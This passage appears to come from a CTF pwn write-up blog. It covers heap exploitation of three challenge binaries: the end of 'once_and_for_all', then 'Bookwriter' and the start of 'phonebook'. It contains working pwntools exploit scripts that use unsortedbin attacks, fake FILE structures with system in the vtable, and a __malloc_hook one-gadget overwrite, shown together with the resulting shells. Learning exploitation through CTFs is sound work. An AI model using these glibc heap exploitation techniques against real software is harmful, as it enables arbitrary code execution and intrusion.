0x30: 0x5555556085e0 —▸ 0x7ffff7dcfca0 (main_arena+96) ◂— 0x5555556085e0
0x40: 0x555555608560 —▸ 0x5555556085a0 ◂— 0x0
unsortedbin
all: 0x5555556085e0 —▸ 0x7ffff7dcfca0 (main_arena+96) ◂— 0x5555556085e0
"""

add(7, 56, b"A"*55) # pop it to access to chunk_1

add(8, 56, b"A"*56 + b"\x31") # restore valid fastbin chunk part of the 0x30 freelist
# put it back to the fastbin 

add(9, 40, pwn.p64(libc + 0x3ebca0) + pwn.p64(stdin + 0x40 - 0x10))
# Write after free, &stdin->_IO_buf_end = stdin + 0x40, minus 0x10 point to the fake header

"""
After:
0x30: 0x7ffff7dcfca0 (main_arena+96) —▸ 0x5555556085e0 ◂— 0x7ffff7dcfca0
unsortedbin
all [corrupted]
FD: 0x5555556085e0 —▸ 0x7ffff7dcfca0 (main_arena+96) ◂— 0x5555556085e0
BK: 0x5555556085e0 —▸ 0x7ffff7dcfa30 (_IO_2_1_stdin_+48) ◂— 0x0
"""

As you can read right above, the chunk_2 has its backward pointer set to &stdin->_IO_buf_end - 0x10. To achieve the partial unlink we just have to request a 0x30 sized chunk with nothing in the fastbin freelists. That's the last step of the unsortedbin attack, clean out the fastbin:

"""
Before: same as above
"""

# == clean fastbin

freexalloc(5, 560, b"", doubleFree=True)

freexalloc(4, 560, b"", doubleFree=True)
add(11, 56, b"1"*56 + b"\x40")

freexalloc(5, 560, b"", doubleFree=True)
add(12, 56, pwn.p64(0))

freexalloc(4, 560, b"", doubleFree=True)
add(13, 56, b"1"*56 + b"\x30")

add(14, 40, b"1"*10)

# == clean fastbin

"""
fastbins
0x30: 0x0
0x40: 0x0
"""

Now we just have to ask for a 0x30 sized chunk:

add(3, 40, b"1337", hang=True)
pwn.log.info(f"unsortedbin attack done on: {hex(stdin + 0x40 - 0x10)}")
pwn.log.info(f"Enjoy your shell!")

"""
After:
0x7ffff7dcfa40 <_IO_2_1_stdin_+64>:	0x00007ffff7dcfca0 <- stdin->_IO_buf_end
0x7ffff7dcfca0 <main_arena+96>:	0x00005555556086b0 <- unsortedbin
"""

FSOP + PROFIT

The last part is very easy, we just have to overflow up to &__malloc_hook to write the one-gadget:

io.sendline(b"") 
io.recvuntil(b">> ") 
io.send( 
        b"4\n\x00\x00\x00" + 
        pwn.p64(libc + 0x3ed8d0) + 
        pwn.p64(0xffffffffffffffff) + 
        pwn.p64(0) + 
        pwn.p64(libc + 0x3ebae0) + 
        pwn.p64(0) * 3 + 
        pwn.p64(0x00000000ffffffff) + 
        pwn.p64(0) * 2 + 
        pwn.p64(libc + 0x3e82a0) + 
        pwn.p8(0) * 0x150 +  
        # !!!!! 
        pwn.p64(libc + 0x10a38c) # <- one-gadget
        #pwn.p64(libc + 0x4f322) 
        # pwn.p64(0x1337) 
        )
"""
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""

The 4\n\x00\x00\x00 corresponds to the option that asks for the huge chunk (we cannot allocate standards chunks anymore) which will trigger __malloc_hook :).

Which gives:

root@3b9bf5405b71:/mnt# python3 exploit.py REMOTE HOST=167.172.56.180 PORT=30332
[*] '/mnt/once_and_for_all'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'/mnt/out'
[+] Opening connection to 167.172.56.180 on port 30332: Done
[*] Switching to interactive mode

How much space do you need for this massive weapon: Adding to your inventory..
$ id
uid=100(ctf) gid=101(ctf)
$ ls
flag.txt
glibc
once_and_for_all
$ cat flag.txt
HTB{m4y_th3_f0rc3_b3_w1th_B0Nn13!}

Find the tasks and the final exploit here and here.

[pwnable - pwn] Bookwriter

Tue, 19 Apr 2022 00:00:00 GMT

What we can do

In the edit feature, we can overwrite the bytes right after any chunk up to the NULL byte.
In the alloc handler, it iterates once too may times through the alloc array, which means it can overlap on the first entry of the size array with a huge size which would be a chunk address, then we can easily trigger large heap overflow.

The libc version is 2.23 which means there not a lot of security checks about _IO_FILE_plus integrity compared to more recent versions.

Top chunk free'in

To target _IO_FILE_plus structures in the libc we need to leak the libc address. To do so we can overwrite the size field of the top chunk with a small value and then requesting a huge chunk which will trigger the release of the top chunk, and put it in the unsorted bin.

The mandatory thing is that new_size + &top_chunk has to be aligned on PAGE_SZ (0x1000).

Which gives:

io = start()

def set_author(name):
    io.sendlineafter(b"Author :", name)

def alloc(size, content):
    io.sendlineafter(b"Your choice :", b"1")
    io.sendlineafter(b"Size of page :", str(size).encode())
    io.sendlineafter(b"Content :", content)

def show(index):
    io.sendlineafter(b"Your choice :", b"2")
    io.sendlineafter(b"Index of page :", str(index).encode())

    io.recvuntil(b"Content :\n")
    return io.recvuntil(b"\n-")[:-2]

def edit(idx, content):
    io.sendlineafter(b"Your choice :", b"3")
    io.sendlineafter(b"Index of page :", str(idx).encode())
    io.sendlineafter(b"Content:", content)

def info():
    io.sendlineafter(b"Your choice :", b"4")
    io.sendlineafter(b"Your choice :", b"4")
    ret = io.recvline()
    io.sendlineafter(b"(yes:1 / no:0) ", b"0")
    return ret

set_author(b"A"*0x40)

alloc(0x18, b"A"*0x18)
edit(0, b"A"*0x18)
edit(0, b"A"*0x18 + pwn.p16(0xfe0 | 0x1))
# overwrite top chunk size field

alloc(0xffff, b"")
# free top chunk

"""
pwndbg> vis

0x1201000	0x0000000000000000	0x0000000000000021	........!.......
0x1201010	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x1201020	0x4141414141414141	0x0000000000000fc1	AAAAAAAA........	 <-- unsortedbin[all][0]
0x1201030	0x00007fc7370efb78	0x00007fc7370efb78	x..7....x..7....
"""

To leak the address, we can alloc a chunk of size zero and print it. Given the fact that the author string is right before the alloc array and that we can overwrite the NULL byte we can in the same way leak the heap address.

for i in range(5):
    alloc(0x0, b"")

heap = info()
heap = pwn.u64(heap[len("Author : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"):][:-1].ljust(8, b"\x00")) & ~0xfff

alloc(0, b"")
libc = pwn.u64(show(2).ljust(8, b"\x00")) - 0x3c4188

print(f"libc: {hex(libc)}")
print(f"heap: {hex(heap)}")

"""
0x150c000	0x0000000000000000	0x0000000000000021	........!.......
0x150c010	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x150c020	0x4141414141414141	0x0000000000000021	AAAAAAAA!.......
0x150c030	0x00007fd150996188	0x00007fd150996188	.a.P.....a.P....
0x150c040	0x000000000150c020	0x0000000000000021	 .P.....!.......
0x150c050	0x00007fd150995b78	0x00007fd150995b78	x[.P....x[.P....
0x150c060	0x0000000000000000	0x0000000000000021	........!.......
0x150c070	0x00007fd150995b78	0x00007fd150995b78	x[.P....x[.P....
0x150c080	0x0000000000000000	0x0000000000000021	........!.......
0x150c090	0x00007fd150995b78	0x00007fd150995b78	x[.P....x[.P....
0x150c0a0	0x0000000000000000	0x0000000000000021	........!.......
0x150c0b0	0x00007fd150995b78	0x00007fd150995b78	x[.P....x[.P....
0x150c0c0	0x0000000000000000	0x0000000000000021	........!.......
0x150c0d0	0x00007fd150996188	0x00007fd150996188	.a.P.....a.P....
0x150c0e0	0x000000000150c0c0	0x0000000000000f01	..P.............	 <-- unsortedbin[all][0]
0x150c0f0	0x00007fd150995b78	0x00007fd150995b78	x[.P....x[.P....
""""

Which gives:

$ python3 exploit.py LOCAL
[*] '/home/nasm/Documents/pwn/pwnable.tw/bookwriter/bookwriter'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'/home/nasm/Documents/pwn/pwnable.tw/bookwriter'
    FORTIFY:  Enabled
[+] Starting local process '/home/nasm/Documents/pwn/pwnable.tw/bookwriter/bookwriter': pid 19375
heap: 0x979000
libc: 0x7f301566d000

File stream exploitation

File stream exploitation is a very interesting way to drop a shell according to the primitives it allows you to leverage. The house of Orange uses the vtable field within a _IO_FILE_plus structure to hiijack the control flow.

According to the libc source code, here is the definition of struct _IO_FILE_plus, _IO_FILE and _IO_jump_t:

/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

struct _IO_FILE {
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;	/* Current read pointer */
  char* _IO_read_end;	/* End of get area. */
  char* _IO_read_base;	/* Start of putback+get area. */
  char* _IO_write_base;	/* Start of put area. */
  char* _IO_write_ptr;	/* Current put pointer. */
  char* _IO_write_end;	/* End of put area. */
  char* _IO_buf_base;	/* Start of reserve area. */
  char* _IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};


/* The 'overflow' hook flushes the buffer.
   The second argument is a character, or EOF.
   It matches the streambuf::overflow virtual function. */
typedef int (*_IO_overflow_t) (_IO_FILE *, int);

The __overflow function pointer is called especially in the _IO_flush_all_lockp function, to really understand how you can reach this function I will put right below all the backtrace from the malloc_printerr function.

static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
  /* Avoid using this arena in future.  We do not attempt to synchronize this
     with anything else because we minimally want to ensure that __libc_message
     gets its resources safely without stumbling on the current corruption.  */
  if (ar_ptr)
    set_arena_corrupt (ar_ptr);

  if ((action & 5) == 5)
    __libc_message (action & 2, "%s\n", str);
  else if (action & 1)
    {
      char buf[2 * sizeof (uintptr_t) + 1];

      buf[sizeof (buf) - 1] = '\0';
      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
      while (cp > buf)
        *--cp = '0';

      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
                      __libc_argv[0] ? : "<unknown>", str, cp);
    }
  else if (action & 2)
    abort ();
}

// => __libc_message is always taken as far as I know when an inconsistency is detected since there is an error to print, but action & 2 is true, which means that anyway, the abort is called as we can see right after in __libc_message.

/* Abort with an error message.  */
void
__libc_message (int do_abort, const char *fmt, ...)
{
  va_list ap;
  int fd = -1;

  va_start (ap, fmt);

#ifdef FATAL_PREPARE
  FATAL_PREPARE;
#endif

  /* Open a descriptor for /dev/tty unless the user explicitly
     requests errors on standard error.  */
  const char *on_2 = __libc_secure_getenv ("LIBC_FATAL_STDERR_");
  if (on_2 == NULL || *on_2 == '\0')
    fd = open_not_cancel_2 (_PATH_TTY, O_RDWR | O_NOCTTY | O_NDELAY);

  if (fd == -1)
    fd = STDERR_FILENO;

  struct str_list *list = NULL;
  int nlist = 0;

  const char *cp = fmt;
  while (*cp != '\0')
    {
      /* Find the next "%s" or the end of the string.  */
      const char *next = cp;
      while (next[0] != '%' || next[1] != 's')
	{
	  next = __strchrnul (next + 1, '%');

	  if (next[0] == '\0')
	    break;
	}

      /* Determine what to print.  */
      const char *str;
      size_t len;
      if (cp[0] == '%' && cp[1] == 's')
	{
	  str = va_arg (ap, const char *);
	  len = strlen (str);
	  cp += 2;
	}
      else
	{
	  str = cp;
	  len = next - cp;
	  cp = next;
	}

      struct str_list *newp = alloca (sizeof (struct str_list));
      newp->str = str;
      newp->len = len;
      newp->next = list;
      list = newp;
      ++nlist;
    }

  bool written = false;
  if (nlist > 0)
    {
      struct iovec *iov = alloca (nlist * sizeof (struct iovec));
      ssize_t total = 0;

      for (int cnt = nlist - 1; cnt >= 0; --cnt)
	{
	  iov[cnt].iov_base = (char *) list->str;
	  iov[cnt].iov_len = list->len;
	  total += list->len;
	  list = list->next;
	}

      written = WRITEV_FOR_FATAL (fd, iov, nlist, total);

      if (do_abort)
	{
	  total = ((total + 1 + GLRO(dl_pagesize) - 1)
		   & ~(GLRO(dl_pagesize) - 1));
	  struct abort_msg_s *buf = __mmap (NULL, total,
					    PROT_READ | PROT_WRITE,
					    MAP_ANON | MAP_PRIVATE, -1, 0);
	  if (__glibc_likely (buf != MAP_FAILED))
	    {
	      buf->size = total;
	      char *wp = buf->msg;
	      for (int cnt = 0; cnt < nlist; ++cnt)
		wp = mempcpy (wp, iov[cnt].iov_base, iov[cnt].iov_len);
	      *wp = '\0';

	      /* We have to free the old buffer since the application might
		 catch the SIGABRT signal.  */
	      struct abort_msg_s *old = atomic_exchange_acq (&__abort_msg,
							     buf);
	      if (old != NULL)
		__munmap (old, old->size);
	    }
	}
    }

  va_end (ap);

  if (do_abort)
    {
      BEFORE_ABORT (do_abort, written, fd);

      /* Kill the application.  */
      abort ();
    }
}

// then abort is called

/* Cause an abnormal program termination with core-dump.  */
void
abort (void)
{
  struct sigaction act;
  sigset_t sigs;

  /* First acquire the lock.  */
  __libc_lock_lock_recursive (lock);

  /* Now it's for sure we are alone.  But recursive calls are possible.  */

  /* Unlock SIGABRT.  */
  if (stage == 0)
    {
      ++stage;
      if (__sigemptyset (&sigs) == 0 &&
	  __sigaddset (&sigs, SIGABRT) == 0)
	__sigprocmask (SIG_UNBLOCK, &sigs, (sigset_t *) NULL);
    }

  /* Flush all streams.  We cannot close them now because the user
     might have registered a handler for SIGABRT.  */
  if (stage == 1)
    {
      ++stage;
      fflush (NULL);
    }

  /* Send signal which possibly calls a user handler.  */
  if (stage == 2)
    {
      /* This stage is special: we must allow repeated calls of
	 `abort' when a user defined handler for SIGABRT is installed.
	 This is risky since the `raise' implementation might also
	 fail but I don't see another possibility.  */
      int save_stage = stage;

      stage = 0;
      __libc_lock_unlock_recursive (lock);

      raise (SIGABRT);

      __libc_lock_lock_recursive (lock);
      stage = save_stage + 1;
    }

  /* There was a handler installed.  Now remove it.  */
  if (stage == 3)
    {
      ++stage;
      memset (&act, '\0', sizeof (struct sigaction));
      act.sa_handler = SIG_DFL;
      __sigfillset (&act.sa_mask);
      act.sa_flags = 0;
      __sigaction (SIGABRT, &act, NULL);
    }

  /* Now close the streams which also flushes the output the user
     defined handler might has produced.  */
  if (stage == 4)
    {
      ++stage;
      __fcloseall ();
    }

  /* Try again.  */
  if (stage == 5)
    {
      ++stage;
      raise (SIGABRT);
    }

  /* Now try to abort using the system specific command.  */
  if (stage == 6)
    {
      ++stage;
      ABORT_INSTRUCTION;
    }

  /* If we can't signal ourselves and the abort instruction failed, exit.  */
  if (stage == 7)
    {
      ++stage;
      _exit (127);
    }

  /* If even this fails try to use the provided instruction to crash
     or otherwise make sure we never return.  */
  while (1)
    /* Try for ever and ever.  */
    ABORT_INSTRUCTION;
}

/*
  Flush all streams.  We cannot close them now because the user
     might have registered a handler for SIGABRT.  

  the fflush is equivalent to a call to _IO_flush_all_lockp 
*/

int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  struct _IO_FILE *fp;
  int last_stamp;

#ifdef _IO_MTSAFE_IO
  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
  if (do_lock)
    _IO_lock_lock (list_all_lock);
#endif

  last_stamp = _IO_list_all_stamp;
  fp = (_IO_FILE *) _IO_list_all;
  while (fp != NULL)
    {
      run_fp = fp;
      if (do_lock)
	_IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
#endif
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

      if (do_lock)
	_IO_funlockfile (fp);
      run_fp = NULL;

      if (last_stamp != _IO_list_all_stamp)
	{
	  /* Something was added to the list.  Start all over again.  */
	  fp = (_IO_FILE *) _IO_list_all;
	  last_stamp = _IO_list_all_stamp;
	}
      else
	fp = fp->_chain;
    }

#ifdef _IO_MTSAFE_IO
  if (do_lock)
    _IO_lock_unlock (list_all_lock);
  __libc_cleanup_region_end (0);
#endif

  return result;
}

The interesting part is in the _IO_flush_all_lockp function, it takes the _IO_list_all global variable to iterate through all the file streams. What we wanna reach would be the _IO_OVERFLOW (fp, EOF) == EOF check, if the control the __overflow field of fp we could hiijack the control flow.

To do so we have to craft a fake _IO_FILE_plus structure on the heap and make the _chain field of an existing file structure point toward our fake structure.

unsortedbin attack

To control the _chain of a file structure we can overwrite the value of _IO_list_all by the address of the unsortedbin with an unsortedbin attack. Then according to the structure of the main_arena the unsortedbin is close to other bins like smallbins. Give the fact that the _chain field is at fp+0x68, we have to take a look at what there is at unsortedbin+0x68. I will not dig into the handling of bins in the main_arena so for this time let's just assume that out of no where unsortedbin+0x68 points to small_bin[4]->bk.

So all we have to do is to craft a fake file structure of size 0x60, free it and next time unsortedbin will be requested, if the requested size is not equal to the chunk of our fake file structure, the fake file structure will be put into the right smallbin.

Put everything together

We can easily craft the vtable to initialize only the __overflow function pointer to the address of system:

fake_vtable = pwn.p64(0) * 3
fake_vtable += pwn.p64(libc + 0x45390) # &system

To craft the _IO_FILE_plus file structure, we need to take care to satisfy this condition seen above in _IO_flush_all_lockp:

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
           || (_IO_vtable_offset (fp) == 0
               && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                                    > fp->_wide_data->_IO_write_base))
#endif
           )
          && _IO_OVERFLOW (fp, EOF) == EOF)

fp->_mode can be null, fp->_IO_write_ptr has to be greater than fp->_IO_write_base. Then _IO_OVERFLOW (fp, EOF) is reached.

Here comes the right file structure:

fake_file = b"/bin/sh\00"                	# _flags
fake_file += pwn.p64(0x61)               	# _IO_read_ptr
fake_file += pwn.p64(libc + 0x1337)    		# _IO_read_end
fake_file += pwn.p64(libc + 0x3c4520 - 0x10)    # _IO_read_base = _IO_list_all - 0x10
fake_file += pwn.p64(1)                  	# _IO_write_base
fake_file += pwn.p64(2)                  	# _IO_write_ptr
fake_file += pwn.p64(0)*18               	# _IO_write_end ... __pad5
fake_file += pwn.p32(0)                  	# _mode
fake_file += pwn.p8(0)*20                	# _unused2
fake_file += pwn.p64(heap + 0xd0) 		# vtable

PROFIT

Here we are :)

$ python3 exploit.py LOCAL
[*] '/home/nasm/Documents/pwn/pwnable.tw/bookwriter/bookwriter'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'/home/nasm/Documents/pwn/pwnable.tw/bookwriter'
    FORTIFY:  Enabled
[+] Starting local process '/home/nasm/Documents/pwn/pwnable.tw/bookwriter/bookwriter': pid 30480
heap: 0x2243000
libc: 0x7fcca564c000
[*] Switching to interactive mode
*** Error in `/home/nasm/Documents/pwn/pwnable.tw/bookwriter/bookwriter': malloc(): memory corruption: 0x00007fcca5a10520 ***
$ id
uid=1000(nasm) gid=1000(nasm) groups=1000(nasm),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),140(libvirt)

Annexes

Final script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('bookwriter')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source /home/nasm/Downloads/pwndbg/gdbinit.py
b* main
continue
'''.format(**locals())

io = None

io = start()

def set_author(name):
    io.sendlineafter(b"Author :", name)

def alloc(size, content, shell=False):
    io.sendlineafter(b"Your choice :", b"1")
    io.sendlineafter(b"Size of page :", str(size).encode())
    
    if shell == True:
        io.interactive()

    io.sendlineafter(b"Content :", content)

def show(index):
    io.sendlineafter(b"Your choice :", b"2")
    io.sendlineafter(b"Index of page :", str(index).encode())

    io.recvuntil(b"Content :\n")
    return io.recvuntil(b"\n-")[:-2]

def edit(idx, content):
    io.sendlineafter(b"Your choice :", b"3")
    io.sendlineafter(b"Index of page :", str(idx).encode())
    io.sendlineafter(b"Content:", content)

def info():
    io.sendlineafter(b"Your choice :", b"4")
    io.sendlineafter(b"Your choice :", b"4")
    ret = io.recvline()
    io.sendlineafter(b"(yes:1 / no:0) ", b"0")
    return ret

set_author(b"A"*0x40)

alloc(0x18, b"A"*0x18)
edit(0, b"A"*0x18)
edit(0, b"A"*0x18 + pwn.p16(0xfe0 | 0x1))
# overwrite top chunk size field


alloc(0xffff, b"")
# free top chunk


# leak libc

for i in range(5):
    alloc(0x0, b"")

heap = info()
heap = pwn.u64(heap[len("Author : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"):][:-1].ljust(8, b"\x00")) & ~0xfff
print(f"heap: {hex(heap)}")

alloc(0, b"")
libc = pwn.u64(show(2).ljust(8, b"\x00")) - 0x3c4188 
print(f"libc: {hex(libc)}")

edit(0, b"")
alloc(0, b"")
# set top zero the first entry a size_array


fake_vtable = pwn.p64(0) * 3
fake_vtable += pwn.p64(libc + 0x45390) # &system

fake_file = b"/bin/sh\00"                # _flags

fake_file += pwn.p64(0x61)               # _IO_read_ptr
fake_file += pwn.p64(libc + 0x1337)    # _IO_read_end
#fake_file += pwn.p64(libc + 0x3c3b78)    # _IO_read_end
fake_file += pwn.p64(libc + 0x3c4520 - 0x10) # _IO_read_base = _IO_list_all - 0x10
fake_file += pwn.p64(1)                  # _IO_write_base
fake_file += pwn.p64(2)                  # _IO_write_ptr
fake_file += pwn.p64(0)*18               # _IO_write_end ... __pad5
fake_file += pwn.p32(0)                  # _mode
fake_file += pwn.p8(0)*20                # _unused2
fake_file += pwn.p64(heap + 0xd0) # 

edit(0, (pwn.p64(0)*3 + pwn.p64(0x21)) * 6 + fake_vtable + pwn.p64(0)*2 + fake_file)
edit(0, b"")

io.recvuntil(b"choice")
io.recvuntil(b"choice")

alloc(0xffff, b"", shell=True)

[DCTF 2022 - pwn] phonebook

Sun, 17 Apr 2022 00:00:00 GMT

Intro

phonebook is a basic heap challenge I did during the dctf event. It's basically just a heap overflow wich allows us to overflow a function pointer with for example the address of system.

The bug

$ ./phonebook
Choose an option: [1-5]
1. Store someone's information
2. Edit information
3. Call someone
4. Unfriend someone
5. Add the hidden_note
>

We can create an entity and then initialize: a name, a numero and a function pointer.

int __fastcall create(unsigned int a1)
{
  int result; // eax
  struct entity *s; // [rsp+18h] [rbp-8h]

  if ( people[a1] )
    return printf("Person with id %d already exists!", a1);
  s = malloc(0x20uLL);
  s->name = get_name();
  LODWORD(s->name_size) = strlen(s->name);
  printf("Phone number: ");
  fgets(s, 8, _bss_start); // phone number
  s->func = choose_relation();
  result = s;
  people[a1] = s;
  return result;
}

The bug lies edit_name function:

unsigned __int64 __fastcall edit_name(int a1)
{
  int n; // [rsp+18h] [rbp-18h] BYREF
  int name_size; // [rsp+1Ch] [rbp-14h]
  struct entity *v4; // [rsp+20h] [rbp-10h]
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  v4 = people[a1];
  name_size = v4->name_size;
  printf("Name length: ");
  __isoc99_scanf("%d", &n);
  fgets(v4->name, 2, _bss_start);
  if ( name_size != n )
  {
    free(v4->name);
    v4->name = malloc(n + 1);
  }
  printf("Name: ");
  fgets(v4->name, n, _bss_start);
  v4->name[n] = 0;
  return __readfsqword(0x28u) ^ v5;
}

We can give it a new lentgh and if that's not equal to the current size field it frees the current name pointer and allocates a new name pointer without updating the size field. Which means if we edit the name pointer with a smaller size, the name pointer will be smaller compared to the size field, then we just have to edit again the size field to make it equal to v4->name_size to trigger a heap overflow through the v4->name pointer.

Leak libc

Now we're able to overflow through the name pointer we have to find how the leak the libc, a nice way would be to leak it by using free'd chunks in the unsortedbin. Or we can leak the entity->func function pointer which would give us a leak of the binary base address, then we would have to edit the name pointer with the got entry of puts to leak its address within the libc.

To do so we can create another entity right after the name pointer:

0x559b0d4d16b0	0x0000000000000000	0x0000000000000031	........1.......
0x559b0d4d16c0	0x3131313131313131	0x0000559b0c84f2a1	11111111.....U..
0x559b0d4d16d0	0x0000559b0d4d1800	0x00000000000000fe	..M..U..........
0x559b0d4d16e0	0x0000000000000000	0x0000000000000111	................
0x559b0d4d16f0	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1700	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1710	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1720	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1730	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1740	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1750	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1760	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1770	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1780	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d1790	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d17a0	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d17b0	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d17c0	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d17d0	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x559b0d4d17e0	0x4141414141414141	0x0000414141414141	AAAAAAAAAAAAAA..
0x559b0d4d17f0	0x0000000000000000	0x0000000000000031	........1.......
0x559b0d4d1800	0x6161616161616161	0x6161616161616161	aaaaaaaaaaaaaaaa
0x559b0d4d1810	0x6161616161616161	0x6161616161616161	aaaaaaaaaaaaaaaa
0x559b0d4d1820	0x0000000000000000	0x0000000000000031	........1.......
0x559b0d4d1830	0x3131313131313131	0x0000559b0c84f2a1	11111111.....U..
0x559b0d4d1840	0x0000559b0c851fa0	0x000000000000000a	.....U..........
0x559b0d4d1850	0x0000000000000000	0x000000000001f7b1	................	 <-- Top chunk

The edit_phone_number overwrites the null byte:

__int64 __fastcall edit_phone_number(int a1)
{
  printf("Enter new phone number: ");
  return __isoc99_scanf("%8s", people[a1]);
}

To summarise:

leak binary base address by overwriting the null byte (edit_phone_number) and then print the phone numer.
leak libc base address by overwriting the name field of the second entity with the got entry of puts

PROFIT

Then we just have to overwrite the function pointer with the address of system which takes as first argument a pointer to the entity structure of edit the phone number of the entity we wanna use because that's the first field of the structure which means we make it equivalent to a system("/bin/sh").

00000000 entity          struc ; (sizeof=0x20, mappedto_8)
00000000 num             dq ?
00000008 func            dq ?
00000010 name            dq ?                    ; offset
00000018 name_size       dq ?
00000020 entity          ends

Then here we are:

$ python3 exploit.py REMOTE HOST=51.124.222.205 PORT=13380
